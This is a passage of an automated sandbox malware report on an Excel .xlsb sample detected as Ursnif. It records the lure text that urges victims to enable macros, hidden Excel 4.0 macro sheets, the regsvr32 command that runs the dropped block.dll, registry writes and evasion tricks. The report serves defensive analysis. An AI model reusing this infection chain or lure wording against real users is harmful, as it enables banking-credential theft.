Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://onedrive.live.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://outlook.office.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://settings.outlook.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://tasks.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr String found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 [i] Once You have Enable Editing, please cli
Source: Screenshot number: 4 Screenshot OCR: Enable Content 13 from the yellow bar above 14 15 / , :: WHY I CANNOT OPEN THIS DOCUMENT? ' 1
Found Excel 4.0 Macro with suspicious formulas
Source: 6613n246zm543w.xlsb Initial sample: EXEC
Source: 6613n246zm543w.xlsb Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 6613n246zm543w.xlsb Initial sample: Sheet size: 25180
Source: 6613n246zm543w.xlsb Initial sample: Sheet size: 45240
Source: 6613n246zm543w.xlsb Initial sample: Sheet size: 38015
Office process drops PE file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\block.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll Jump to dropped file
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB18D1 GetProcAddress,NtCreateSection,memset, 1_2_66DB18D1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB1B89 NtMapViewOfSection, 1_2_66DB1B89
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB2485 NtQueryVirtualMemory, 1_2_66DB2485
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB2264 1_2_66DB2264
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DF348A 1_2_66DF348A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DE7AD7 1_2_66DE7AD7
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\block.dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@12/59@4/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{2CCBB9CE-342A-4F78-A4D3-93ED91BA9B6E} - OProcSessId.dat Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 6613n246zm543w.xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: 6613n246zm543w.xlsb Initial sample: OLE zip file path = xl/media/image2.png
Source: 6613n246zm543w.xlsb Initial sample: OLE zip file path = xl/media/image3.png
Source: 6613n246zm543w.xlsb Initial sample: OLE zip file path = xl/media/image4.png
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress, 1_2_66DB1F31
Registers a DLL
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB2253 push ecx; ret 1_2_66DB2263
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB2200 push ecx; ret 1_2_66DB2209
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DBFE6C push ebx; retf 1_2_66DBFE6D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC677F push esi; iretd 1_2_66DC678A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DE4475 push ecx; ret 1_2_66DE4488
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC446A push esi; ret 1_2_66DC446B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC2403 push ebp; retf 1_2_66DC244E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC243F push ebp; retf 1_2_66DC244E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC5B7B push eax; ret 1_2_66DC5B7C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DC633B push edx; retf 1_2_66DC6345
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DFD33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_66DFD348
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DFE175 push ds; iretd 1_2_66DFE179

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\block.dll Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\block.dll Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\Public\block.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 Thread sleep count: 203 > 30 Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress, 1_2_66DB1F31
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DFBFB5 mov eax, dword ptr fs:[00000030h] 1_2_66DFBFB5
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DFBAF2 push dword ptr fs:[00000030h] 1_2_66DFBAF2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DFBEEB mov eax, dword ptr fs:[00000030h] 1_2_66DFBEEB
Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp Binary or memory string: Progman
Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_66DB1566
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_66DF5C41
